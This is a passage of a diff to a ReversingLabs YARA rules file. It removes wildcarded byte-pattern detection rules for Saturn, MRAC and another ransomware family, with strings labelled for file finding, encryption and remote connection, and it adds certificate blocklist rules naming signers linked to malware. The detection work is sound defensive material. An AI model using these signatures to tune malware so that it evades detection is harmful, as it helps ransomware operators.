-            ?? EB ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8A 45 ?? 50 8A 45 ?? 50 FF 75 ?? 68 ?? ??
-            ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B
-            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0
-            40 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 4F
-        }
-		$enum_resources = {
-            55 8B EC 83 C4 ?? 53 56 57 8B F9 89 55 ?? 8B F0 8B 5D ?? C6 45 ?? ?? 33 C0 89 03 33
-            C0 89 07 8D 45 ?? 50 8B 45 ?? 50 6A ?? 56 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 03 83 3B ?? 74 ?? 83 3B ?? 74 ??
-            C7 07 ?? ?? ?? ?? 8B 03 33 C9 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 03 50 57 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 75 ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ?? EB
-            ?? BE ?? ?? ?? ?? EB ?? 81 FE ?? ?? ?? ?? 74 ?? 85 F6 0F 94 45 ?? 80 7D ?? ?? 75 ??
-            8B 03 E8 ?? ?? ?? ?? 33 C0 89 03 33 C0 89 07 8B 45 ?? 50 E8 ?? ?? ?? ?? 8A 45 ?? 5F
-            5E 5B 8B E5 5D C2
-        }
-		$remote_connection_p1 = {
-            BB ?? ?? ?? ?? 83 FB ?? 75 ?? 33 C0 89 45 ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 8B
-            C6 E8 ?? ?? ?? ?? 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 33 C0 89 45 ?? 8D 45 ??
-            50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 83 C0
-            ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ?? 8B 45 ?? 59 E8 ?? ?? ??
-            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ??
-            ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D 85 ?? ?? ?? ?? 8B 55 ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B D0 42 8B 45 ?? 59 E8
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 FF 0F
-            85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45
-            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89
-            45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D
-            ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A
-        }
-		$remote_connection_p2 = {
-            68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74
-            ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50 8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A
-            58 76 ?? EB ?? 5A 58 7E ?? 8B 06 E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ??
-            ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03 C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D
-            ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ??
-            8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A
-            ?? 8B 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50
-            8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 76 ?? EB ?? 5A 58 7E ?? 8B 06
-            E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03
-            C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D
-            ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8
-        }
-		$encrypt_files = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75
-            ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ??
-            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55
-            ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D
-            ?? ?? 74
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "7d:ef:22:ef:4c:64:5b:1d:ec:fb:36:b6:d3:53:9d:bf" and 1474416000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Saturn : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Saturn ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "70a8d937-aee5-54d8-9409-c5d2d0830a2b"
-		date = "2020-10-19"
-		modified = "2020-10-19"
+		id = "87477ad5-fc7e-5407-9c6e-bef3d4d8981d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Saturn.yara#L1-L105"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16564-L16580"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "efa748346ad8c46e654542d302e81d633a2d12f421636c477431a12a34636132"
+		logic_hash = "3b4a55149b3895eeea5f96297d1fc9787eb74e2fcef8170148ef1a2ced334311"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Saturn"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_1 = {
-            6A ?? C6 45 ?? ?? 8D 4D ?? 8B 3B 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 3B C8 74 ??
-            83 78 ?? ?? 8B C8 72 ?? 8B 08 FF 70 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A
-        }
-		$find_files_2_p1 = {
-            68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? FF 75
-            ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D
-            4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85
-            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ??
-            0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ??
-            ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50
-            8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83
-        }
-		$find_files_2_p2 = {
-            F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF
-            15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B F0 80
-            BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 00
-            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B D0
-            8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? F6
-            85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E9
-        }
-		$encrypt_files_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 89 9D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 6A ?? FF B5
-            ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF D6 8B D8
-            83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 57
-            FF D6 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3
-            A5 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF B5 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ??
-            ?? ?? ?? 85 F6 0F 95 C3 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 89 B5 ?? ?? ?? ?? 56 53 FF
-        }
-		$encrypt_files_p2 = {
-            15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 56 ?? 8B 85 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 C8 8D 85 ?? ?? ?? ??
-            3B 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 6A ?? 0F 44 F2 56 6A ??
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 BA ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 FF B5
-            ?? ?? ?? ?? FF D6 B3 ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ??
-            ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77
-            ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B
-            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "3e:39:c2:cc:c4:94:43:8b:b8:c2:56:0f" and 1466142876 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "66025c6e-5d85-5660-87f1-3094a536bbe2"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16582-L16598"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "86b06519858dce4b77cb870905297a1fd1c767053fd07c0b0469eb7fc3ba6b32"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divisible Limited" and pe.signatures [ i ] . serial == "6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" and 1507248000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_MRAC : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MRAC ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "135c3dc9-bf08-5f00-bade-7054d9f33830"
-		date = "2022-02-21"
-		modified = "2022-02-21"
+		id = "b80b1832-6bfa-555b-8462-cd17f9e5e0e1"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MRAC.yara#L1-L69"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16600-L16616"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "04e8364dc9c726f4bb2d3035e5b7e8dab4cae124b2f047be6f11b865fab557a7"
+		logic_hash = "87202c29867e6410d59c1e3b5ab09a24ebac5c68c61d7b932b91a91dcf3707e2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MRAC"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            B8 ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ??
-            83 C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B 75 ?? 85 C0 75 ?? B1
-            ?? EB ?? 32 C9 8B 45 ?? 88 4D ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? 8B C6 81 F9 ??
-            ?? ?? ?? 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ??
-            8A 4D ?? 83 C4 ?? 8A C1 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ??
-            ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8
-        }
-		$import_key = {
-            8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 89 45 ?? 8D 4D ?? 51 50 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? FF
-            75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F
-            84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15
-            ?? ?? ?? ?? 8B C8 F6 C1 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 C1 E8 ?? 40 C1 E0 ?? 2B
-            C1 68 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 6A
-            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 45 ?? 3D ?? ?? ?? ?? 0F 92 C3 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 57 6A ?? 0F
-            B6 C3 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D
-            45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? EB ?? 8B 75 ?? 84
-            DB 74
-        }
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 74 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 06 FF
-            D7 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3
-            F6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B
-            4D ?? 6A ?? 68 ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
